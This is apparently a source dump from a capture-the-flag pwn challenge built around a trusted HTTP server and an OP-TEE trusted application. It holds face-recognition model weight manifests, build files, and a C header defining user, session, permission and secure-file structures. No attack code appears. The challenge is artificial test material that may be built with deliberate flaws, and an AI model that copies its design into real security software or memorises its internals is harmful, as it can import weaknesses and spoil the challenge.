"dtype":"float32","quantization":{"dtype":"uint8","scale":0.021025861478319356,"min":-2.2077154552235325}},{"name":"dense2/conv1/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00349616945958605,"min":-0.46149436866535865}},{"name":"dense2/conv2/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008104994250278847,"min":-1.013124281284856}},{"name":"dense2/conv2/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.029337059282789044,"min":-3.5791212325002633}},{"name":"dense2/conv2/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0038808938334969913,"min":-0.4230174278511721}},{"name":"fc/weights","shape":[128,136],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014016061670639936,"min":-1.8921683255363912}},{"name":"fc/bias","shape":[136],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0029505149698724935,"min":0.088760145008564}}],"paths":["face_landmark_68_tiny_model-shard1"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard2 
-------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-weights_manifest.json: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/mtcnn_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/mtcnn_model-shard1
-------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/mtcnn_model-weights_manifest.json: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard1
-------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard2
-------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-weights_manifest.json: --------------------------------------------------------------------------------
epthwise_weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.0083988838336047,"min":0.36280909180641174,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.02858148649627087,"min":-3.6584302715226715,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.03988401375564874,"min":-7.099354448505476,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.009090481683904049,"min":0.020878996700048447,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,256,256],"quantization":{"scale":0.008951201625898773,"min":-1.1189002032373465,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.051758006974762565,"min":-5.745138774198645,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,256,1],"quantization":{"scale":0.004110433190476661,"min":-0.6042336790000691,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/depthwise_weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.013170199768216002,"min":0.3386639356613159,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.03599378548416437,"min":-3.70735990486893,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.026967673208199296,"min":-3.748506575939702,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.012615410486857097,"min":3.9111388979838637e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/movi
ng_variance"},{"dtype":"float32","shape":[1,1,256,512],"quantization":{"scale":0.00822840648538926,"min":-1.1848905338960536,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.06608965817619772,"min":-7.468131373910342,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.008801074355256323,"min":-0.9593171047229393,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.030577416513480393,"min":0.3285980224609375,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04778536441279393,"min":-8.935863145192464,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04331884945140165,"min":-9.660103427662568,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04126455444367785,"min":0.000604183878749609,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.009305818408143287,"min":-1.1446156642016243,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04640720217835669,"min":-4.733534622192383,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.008138792655047248,"min":-0.9766551186056698,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.027351748358969596,"min":0.34030041098594666,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/gam
ma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04415061053107767,"min":-7.019947074441349,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.02476683784933651,"min":-2.9224868662217083,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.02547598832684076,"min":0.00026032101595774293,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.01083052625843123,"min":-1.2563410459780227,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.06360894371481503,"min":-7.951117964351878,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.006704086883395326,"min":-0.8648272079579971,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.015343831567203297,"min":0.2711026668548584,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.03378283930759804,"min":-4.797163181678922,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.021910778213949763,"min":-3.987761634938857,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.009284070410007296,"min":0.000021581046894425526,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.012783036979974485,"min":-1.9046725100161983,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_pointwise/weights
"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.07273082733154297,"min":-9.52773838043213,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.006126228033327589,"min":-0.7351473639993107,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.029703759212119908,"min":0.28687000274658203,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04394429898729511,"min":-6.3279790541704966,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.016566915605582443,"min":-2.7501079905266854,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.012152872833551145,"min":3.913338286370366e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.01354524388032801,"min":-1.7473364605623134,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.08566816367355047,"min":-9.937506986131854,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.006012305558896532,"min":-0.7876120282154457,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.01469323155926723,"min":0.29223933815956116,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.030889174517463234,"min":-3.2433633243336395,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/
beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.014836942448335536,"min":-2.047498057870304,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.007234466105343445,"min":0.00013165915152058005,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.016261722527298274,"min":-1.4798167499841428,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.091437328563017,"min":-14.172785927267636,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.004750356487199372,"min":-0.650798838746314,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.008174965545242907,"min":0.3120670020580292,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.030133422215779623,"min":-2.41067377726237,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.006088157261119169,"min":-0.7853722866843729,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.003668997334498985,"min":3.9124486300013356e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,1024],"quantization":{"scale":0.010959514449624454,"min":-1.4028178495519301,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_pointwise/weights"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.10896045834410424,"min":-14.818622334798176,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_pointwis
e/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,1024,1],"quantization":{"scale":0.004633033509347953,"min":-0.5652300881404502,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/depthwise_weights"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.022285057224479377,"min":0.23505790531635284,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.0324854850769043,"min":-3.9957146644592285,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.014760061806323482,"min":-2.125448900110581,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.0036057423142825855,"min":3.9067056828997994e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,1024,1024],"quantization":{"scale":0.017311988157384536,"min":-2.094750567043529,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_pointwise/weights"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.16447528764313343,"min":-25.658144872328815,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,1024,256],"quantization":{"scale":0.0026493051472832175,"min":-0.36825341547236723,"dtype":"uint8"},"name":"Prediction/Conv2d_0_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.012474596734140433,"min":-2.3078003958159803,"dtype":"uint8"},"name":"Prediction/Conv2d_0_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,256,512],"quantization":{"scale":0.014533351449405445,"min":-1.8166689311756807,"dtype":"uint8"},"name":"Prediction/Conv2d_1_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.024268776762719248,"min":-2.4754152297973633,"dtype":"uint8"},"name":"Prediction/Conv2
d_1_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,512,128],"quantization":{"scale":0.002208403746287028,"min":-0.28709248701731366,"dtype":"uint8"},"name":"Prediction/Conv2d_2_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.012451349052728392,"min":-1.5937726787492341,"dtype":"uint8"},"name":"Prediction/Conv2d_2_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,128,256],"quantization":{"scale":0.026334229637594783,"min":-2.8967652601354263,"dtype":"uint8"},"name":"Prediction/Conv2d_3_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.02509917792151956,"min":-1.4055539636050953,"dtype":"uint8"},"name":"Prediction/Conv2d_3_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,256,128],"quantization":{"scale":0.004565340046789132,"min":-0.3971845840706545,"dtype":"uint8"},"name":"Prediction/Conv2d_4_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.017302456556581983,"min":-2.5953684834872974,"dtype":"uint8"},"name":"Prediction/Conv2d_4_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,128,256],"quantization":{"scale":0.025347338470758176,"min":-3.8527954475552426,"dtype":"uint8"},"name":"Prediction/Conv2d_5_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.033134659598855414,"min":-2.9158500446992766,"dtype":"uint8"},"name":"Prediction/Conv2d_5_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,256,64],"quantization":{"scale":0.002493104397081861,"min":-0.2817207968702503,"dtype":"uint8"},"name":"Prediction/Conv2d_6_pointwise/weights"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.011383360974928912,"min":-1.2749364291920382,"dtype":"uint8"},"name":"Prediction/Conv2d_6_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,64,128],"quantization":{"scale":0.020821522731407017,"min":-2.7484410005457263,"dtype":"uint8"},"name":"Prediction/Conv2d_7_pointwis
e/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.052144218893612135,"min":-3.5979511036592373,"dtype":"uint8"},"name":"Prediction/Conv2d_7_pointwise/convolution_bn_offset"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":6,"dtype":"uint8"},"name":"Prediction/BoxPredictor_5/stack_1/1"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":1,"dtype":"uint8"},"name":"concat_1/axis"},{"dtype":"int32","shape":[1],"quantization":{"scale":1,"min":0,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/strided_slice/stack"},{"dtype":"int32","shape":[1],"quantization":{"scale":1,"min":1,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/strided_slice/stack_1"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":5118,"dtype":"uint8"},"name":"Postprocessor/stack/1"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":4,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/stack/3"},{"dtype":"float32","shape":[1, 5118, 4],"name":"Output/extra_dim"}]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/tiny_face_detector_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/tiny_face_detector_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/tiny_face_detector_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | 

--------------------------------------------------------------------------------
/src/d3_trusted_core/ta/Android.mk:
--------------------------------------------------------------------------------
LOCAL_PATH := $(call my-dir)

local_module := ae13ed5a-4d7a-47b6-81f1-20cd2adfb340.ta
include $(BUILD_OPTEE_MK)

--------------------------------------------------------------------------------
/src/d3_trusted_core/ta/Makefile:
--------------------------------------------------------------------------------
CFG_TEE_TA_LOG_LEVEL ?= 4
CFG_TA_OPTEE_CORE_API_COMPAT_1_1=y

# The UUID for the Trusted Application
BINARY=ae13ed5a-4d7a-47b6-81f1-20cd2adfb340

-include $(TA_DEV_KIT_DIR)/mk/ta_dev_kit.mk

ifeq ($(wildcard $(TA_DEV_KIT_DIR)/mk/ta_dev_kit.mk), )
clean:
	@echo 'Note: $$(TA_DEV_KIT_DIR)/mk/ta_dev_kit.mk not found, cannot clean TA'
	@echo 'Note: TA_DEV_KIT_DIR=$(TA_DEV_KIT_DIR)'
endif

-------------------------------------------------------------------------------- /src/d3_trusted_core/ta/include/d3_trusted_core_ta.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2016-2017, Linaro Limited 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright notice, 12 | * this list of conditions and the following disclaimer in the documentation 13 | * and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 16 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 17 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 18 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 19 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 20 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 21 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 22 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 23 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 24 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 25 | * POSSIBILITY OF SUCH DAMAGE. 
26 | */ 27 | #ifndef TA_D3_TRUSTED_CORE_H 28 | #define TA_D3_TRUSTED_CORE_H 29 | 30 | /* 31 | * This UUID is generated with uuidgen 32 | * the ITU-T UUID generator at http://www.itu.int/ITU-T/asn1/uuid.html 33 | */ 34 | // ae13ed5a-4d7a-47b6-81f1-20cd2adfb340 35 | #define TA_D3_TRUSTED_CORE_UUID \ 36 | { 0xae13ed5a, 0x4d7a, 0x47b6, \ 37 | { 0x81, 0xf1, 0x20, 0xcd, 0x2a, 0xdf, 0xb3, 0x40} } 38 | 39 | 40 | #define TA_D3_CMD_DEBUG_LOG 0x1000 41 | #define TA_D3_CMD_AUTH_USER_PASSWD 0x1001 42 | #define TA_D3_CMD_AUTH_USER_FACE_ID 0x1002 43 | #define TA_D3_CMD_AUTH_SESSION_ID 0x1003 44 | 45 | #define TA_D3_CMD_GET_USER_INFO 0x2000 46 | #define TA_D3_CMD_GET_USER_LIST 0x2001 47 | 48 | #define TA_D3_CMD_USER_PASSWD 0x2010 49 | #define TA_D3_CMD_USER_ENABLE 0x2011 50 | #define TA_D3_CMD_USER_DISABLE 0x2012 51 | #define TA_D3_CMD_USER_RESET 0x2013 52 | 53 | #define TA_D3_CMD_USER_LOGOUT 0x2020 54 | #define TA_D3_CMD_USER_KICKOUT 0x2021 55 | 56 | #define TA_D3_CMD_CREATE_SEC_FILE 0x3000 57 | #define TA_D3_CMD_DELETE_SEC_FILE 0x3001 58 | #define TA_D3_CMD_READ_SEC_FILE 0x3002 59 | #define TA_D3_CMD_UPDATE_SEC_FILE 0x3003 60 | #define TA_D3_CMD_RENAME_SEC_FILE 0x3004 61 | 62 | #define TA_D3_CMD_CREATE_SEC_DIR 0x3010 63 | #define TA_D3_CMD_DELETE_SEC_DIR 0x3011 64 | #define TA_D3_CMD_GET_SEC_FILE_INFO 0x3012 65 | #define TA_D3_CMD_GET_SEC_DIR_INFO 0x3013 66 | #define TA_D3_CMD_GET_SECFS_SLOTS_INFO 0x3020 67 | 68 | #define TA_D3_CMD_CHECK_ALIVE 0x4000 69 | #define TA_D3_CMD_CALC_SHA256 0x4001 70 | 71 | #define TEE_SHA256_HASH_SIZE 32u 72 | 73 | #define MAX_USERNAME_LEN 128 74 | #define MIN_PASSWORD_LEN 6 75 | #define MAX_PASSWORD_LEN 128 76 | #define PASSWORD_HASH_SIZE (TEE_SHA256_HASH_SIZE*2) 77 | #define MAX_SESSION_LEN 128 78 | #define HTTP_SESSION_LEN (TEE_SHA256_HASH_SIZE*2) 79 | enum { 80 | USER_TYPE_ADMIN, 81 | USER_TYPE_USER, 82 | USER_TYPE_GUEST, 83 | USER_TYPE_COUNT 84 | }; 85 | enum { 86 | ACTION_PERMISSON_PASSWD, 87 | ACTION_PERMISSON_ENABLE, 88 | 
ACTION_PERMISSON_DISABLE, 89 | ACTION_PERMISSON_KICOOUT, 90 | ACTION_PERMISSON_RESET, 91 | ACTION_PERMISSON_CREATE_FILE, 92 | ACTION_PERMISSON_DELETE_FILE, 93 | ACTION_PERMISSON_CREATE_DIR, 94 | ACTION_PERMISSON_DELETE_DIR, 95 | ACTION_PERMISSON_READ_FILE, 96 | ACTION_PERMISSON_WRITE_FILE, 97 | ACTION_PERMISSON_LIST_FILE, 98 | ACTION_COUNT 99 | }; 100 | static uint8_t admin_permission_table[USER_TYPE_COUNT][ACTION_COUNT]; 101 | static uint8_t user_permission_table[USER_TYPE_COUNT][ACTION_COUNT]; 102 | static uint8_t guest_permission_table[USER_TYPE_COUNT][ACTION_COUNT]; 103 | static const char *user_type_table[USER_TYPE_COUNT+1] = { 104 | "admin", 105 | "user", 106 | "guest", 107 | 0 108 | }; 109 | #define USER_MAGIC_NORMAL 0x72657375 110 | #define USER_MAGIC_DISABLED 0xffffffff 111 | typedef struct UserInfo user_info_t; 112 | struct UserInfo{ 113 | uint32_t magic; 114 | uint32_t uid; 115 | uint32_t type; 116 | uint32_t face_id; 117 | char username[MAX_USERNAME_LEN+8]; 118 | char password[MAX_PASSWORD_LEN+8]; 119 | uint32_t face_id_expired_round; 120 | double *face_data; 121 | user_info_t *next; 122 | }; 123 | typedef struct UserInfoOut user_info_out_t; 124 | struct UserInfoOut{ 125 | // public regions 126 | uint32_t magic; 127 | uint32_t uid; 128 | uint32_t type; 129 | uint32_t face_id; 130 | char username[MAX_USERNAME_LEN+8]; 131 | }; 132 | 133 | #define FILE_NODE_EMPTY 0x1 134 | #define FILE_NODE_DIR 0x2 135 | #define FILE_NODE_FILE 0x4 136 | #define FILE_NODE_DEL 0xff 137 | #define OBJ_ID_SIZE TEE_SHA256_HASH_SIZE*2 138 | 139 | typedef struct FileNode file_node_t; 140 | struct FileNode{ 141 | uint32_t node_type; 142 | uint32_t parent_id; 143 | uint32_t ext_id; 144 | uint32_t owner; 145 | uint32_t file_size; 146 | char obj_id[OBJ_ID_SIZE]; 147 | }; 148 | 149 | #define MAKE_FILE_NODE_FILE(node, _parent_id, _ext_id, _owner, _file_sz, _obj_id) ({ \ 150 | int _ret = 0; \ 151 | (node).node_type = FILE_NODE_FILE; \ 152 | (node).parent_id = _parent_id; \ 153 | 
(node).ext_id = _ext_id; \ 154 | (node).owner = _owner; \ 155 | (node).file_size = _file_sz; \ 156 | memcpy(node.obj_id, _obj_id, OBJ_ID_SIZE); \ 157 | _ret; \ 158 | }) 159 | #define MAKE_FILE_NODE_DIR(node, _parent_id, _ext_id, _owner, _obj_id) ({ \ 160 | int _ret = 0; \ 161 | (node).node_type = FILE_NODE_DIR; \ 162 | (node).parent_id = _parent_id; \ 163 | (node).ext_id = _ext_id; \ 164 | (node).owner = _owner; \ 165 | (node).file_size = 0; \ 166 | memcpy(node.obj_id, _obj_id, OBJ_ID_SIZE); \ 167 | _ret; \ 168 | }) 169 | 170 | #define MAKE_FILE_NODE_EMPTY(node) ({ \ 171 | int _ret = 0; \ 172 | memset(&(node), 0, sizeof(file_node_t)); \ 173 | (node).node_type = FILE_NODE_EMPTY; \ 174 | _ret; \ 175 | }) 176 | 177 | #define MAX_FILE_COUNT 128 178 | #define MAX_FILE_ID MAX_FILE_COUNT 179 | #define MAX_FILE_NAME 128 180 | #define MAX_DIR_NAME MAX_FILE_NAME 181 | #define MAX_FILE_DATA 4096 182 | #define SEC_FILE_STATUS_FILE 0xffff1000 183 | #define SEC_FILE_STATUS_DIR 0xffff1001 184 | #define SEC_FILE_STATUS_DEL 0xffffffff 185 | 186 | 187 | typedef struct SecFile sec_file_t; 188 | typedef sec_file_t sec_dir_t; 189 | #pragma pack(push, 4) 190 | struct SecFile{ 191 | uint32_t magic; 192 | char hash[TEE_SHA256_HASH_SIZE]; 193 | uint32_t name_size; 194 | uint32_t data_size; 195 | char filename[MAX_FILE_NAME]; 196 | uint32_t status; 197 | char data[0]; 198 | }; 199 | #pragma pack(pop) 200 | 201 | 202 | typedef struct FileInfo file_info_t; 203 | struct FileInfo{ 204 | uint32_t magic; 205 | uint32_t node_type; 206 | uint32_t parent_id; 207 | uint32_t ext_id; 208 | uint32_t owner; 209 | uint32_t file_size; 210 | char filename[MAX_FILE_NAME]; 211 | char hash[TEE_SHA256_HASH_SIZE*2]; 212 | }; 213 | 214 | typedef struct DirInfo dir_info_t; 215 | struct DirInfo{ 216 | uint32_t magic; 217 | uint32_t node_type; 218 | uint32_t parent_id; 219 | uint32_t ext_id; 220 | uint32_t owner; 221 | char dir_name[MAX_FILE_NAME]; 222 | uint8_t sub_items[MAX_FILE_COUNT]; 223 | }; 224 | 225 | 
